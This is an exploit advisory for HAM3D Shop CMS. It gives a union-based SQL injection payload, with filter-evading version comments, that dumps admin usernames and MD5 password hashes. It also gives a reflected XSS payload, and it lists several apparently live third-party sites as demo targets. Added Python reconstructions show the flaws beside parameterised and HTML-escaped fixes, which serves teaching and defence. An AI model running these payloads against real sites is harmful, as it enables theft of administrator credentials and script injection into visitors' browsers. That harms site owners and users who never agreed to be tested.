# Exploit Title: HAM3D Shop CMS - SQL Injection ('ID' parameter in page.php) & Reflected XSS ('ID' parameter in rating/rating.php)
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: HAm3D.net
# Version: Final Version
# Tested on: Windows, Linux
=================================================================================
[SQL injection]
[+] Method: union-based SQL injection (Nullix Security Team of Iran)
[+] Admin login page: www.[path].com/admin/login.php
[+] Vulnerable file / parameter: page.php?ID= (the ID value is placed into the SQL query without sanitization)
=================
Password hash: MD5 (admin accounts are stored in the auser table)
=================
Exploit ==>
page.php?ID=-1'+/*!50000union*/ select /*!50000unhex(hex(grOup_cOncat(username,0x3a,password)))*/+from+auser--+
Notes: ID=-1 empties the page's own result set so the injected row is what gets rendered; the /*!50000 ... */ version comments are executed by MySQL >= 5.0 but look like comments to naive keyword filters; unhex(hex(...)) returns the group_concat result as a clean byte string and 0x3a is the ':' separator; --+ comments out the trailing quote. The payload uses a single UNION column, so it only works where page.php selects one column; if the target's query differs, pad the UNION with extra columns first.
=================================================================================
Demo:
[+] http://nanokala.ir/page.php?ID=[SQL]
[+] http://www.too30.ir/page.php?ID=[SQL]
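Added example, not part of the original advisory and not HAM3D's code: a Python/sqlite3 reconstruction of why the payload above dumps username:password pairs, with the vulnerable string-built query beside the parameterised fix. The auser table and its username/password columns come from the advisory; the page table, its title column, the sample rows and the MD5 sample passwords are constructed assumptions. SQLite has no /*!50000 ... */ comments, unhex/hex or 0x3a literals, so the payload is rewritten as the plain UNION it reduces to.

```python
import hashlib
import sqlite3

# Constructed stand-in for the CMS database. The auser table and its
# username/password columns come from the advisory's payload; the page
# table, its title column and the sample rows are assumptions. Passwords
# are MD5 hex digests, matching the advisory's "Mode Hash : MD5" note.
SAMPLE_USERS = [("admin", "password"), ("editor", "test")]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE page (ID INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO page VALUES (1, 'About us'), (2, 'Contact');
        CREATE TABLE auser (username TEXT, password TEXT);
        """
    )
    con.executemany(
        "INSERT INTO auser VALUES (?, ?)",
        [(u, hashlib.md5(p.encode()).hexdigest()) for u, p in SAMPLE_USERS],
    )
    return con


def page_title_vulnerable(con: sqlite3.Connection, page_id: str) -> list:
    # Hypothetical reconstruction of the flaw: the ID value is pasted into the
    # SQL string, so the quote inside the payload ends the literal early.
    sql = "SELECT title FROM page WHERE ID='" + page_id + "'"
    return [row[0] for row in con.execute(sql)]


def page_title_fixed(con: sqlite3.Connection, page_id: str) -> list:
    # Parameterised query: the whole value is bound as one literal and can
    # never change the statement's structure.
    return [row[0] for row in con.execute("SELECT title FROM page WHERE ID=?", (page_id,))]


# SQLite equivalent of the advisory's payload. '-1' empties the first SELECT
# so the only row rendered is the injected one; the single UNION column
# matches the single column the page query selects; '-- ' comments out the
# trailing quote the application appends.
PAYLOAD = "-1' UNION SELECT group_concat(username || ':' || password, ',') FROM auser-- "


def dump_credentials(con: sqlite3.Connection) -> dict:
    """Return {username: md5hash} parsed from the injected page title."""
    leaked = page_title_vulnerable(con, PAYLOAD)
    creds = {}
    for entry in leaked[0].split(","):
        user, _, digest = entry.partition(":")
        creds[user] = digest
    return creds


if __name__ == "__main__":
    db = make_db()
    print("normal request :", page_title_vulnerable(db, "1"))
    print("injected       :", dump_credentials(db))
    print("fixed + payload:", page_title_fixed(db, PAYLOAD))
```

Against the parameterised version the same payload is just a string that matches no ID and returns nothing, which is the check to run after patching: the injected request must return an empty page, not an error that leaks the query.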
=================================================================================
[XSS]
Method: reflected cross-site scripting (Nullix Security Team of Iran)
HTTP method = GET
Directory : /rating/
Parameter : rating.php?ID=
Payload : [ "><script>alert(/xss/)</script> ]
The ID value is reflected into the page without HTML encoding; the leading "> closes the attribute and tag it lands in, and the script that follows runs in the visitor's browser.
For example : ==== > www.[path].com/rating/rating.php?ID="><script>alert(/xss/)</script>
======================================================================
[+] Demo : nanokala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : jamkala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : too30.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
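Added example, not part of the original advisory and not HAM3D's code: a Python reconstruction of the reflection that makes the "> payload work, beside the encoded version that stops it, plus the reflection check a tester runs before trying a full payload. The form markup, the hostname shop.example and the helper names are assumptions; only the rating.php path, the ID parameter and the payload come from the advisory.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Hypothetical reconstruction of rating.php: the ID value is written back into
# a form field. The advisory's "> prefix implies a double-quoted attribute
# context; the exact markup below is an assumption.
def render_rating_vulnerable(page_id: str) -> str:
    return ('<form action="rating.php" method="get">'
            '<input type="hidden" name="ID" value="' + page_id + '">'
            '<input type="submit" value="Rate"></form>')


def render_rating_fixed(page_id: str) -> str:
    # html.escape(quote=True) turns " into &quot; and < > into entities, so the
    # value can no longer terminate the attribute or open a tag.
    safe = html.escape(page_id, quote=True)
    return ('<form action="rating.php" method="get">'
            '<input type="hidden" name="ID" value="' + safe + '">'
            '<input type="submit" value="Rate"></form>')


def id_from_url(url: str) -> str:
    """Extract the GET parameter ID exactly as the server would receive it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("ID", [""])[0]


def reflected_unescaped(render, probe: str) -> bool:
    """Reflection check: is the probe echoed back byte-for-byte in the response?"""
    return probe in render(probe)


PAYLOAD = '"><script>alert(/xss/)</script>'
# Placeholder host for the target; not one of the advisory's demo sites.
EXAMPLE_URL = "http://shop.example/rating/rating.php?ID=" + PAYLOAD

if __name__ == "__main__":
    pid = id_from_url(EXAMPLE_URL)
    print("vulnerable:", render_rating_vulnerable(pid))
    print("fixed     :", render_rating_fixed(pid))
    print("reflected unescaped:", reflected_unescaped(render_rating_vulnerable, pid))
```

In the vulnerable output the value attribute ends at the payload's first "> and a live script element follows it; in the fixed output the same characters appear only as &quot;&gt;&lt;script&gt; inside the attribute. Encoding must happen at the point of output, because the same ID value is also used in the page.php SQL query, where attribute encoding does nothing.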
======================================================================
[+] Thanks to ======> Nullix Team guys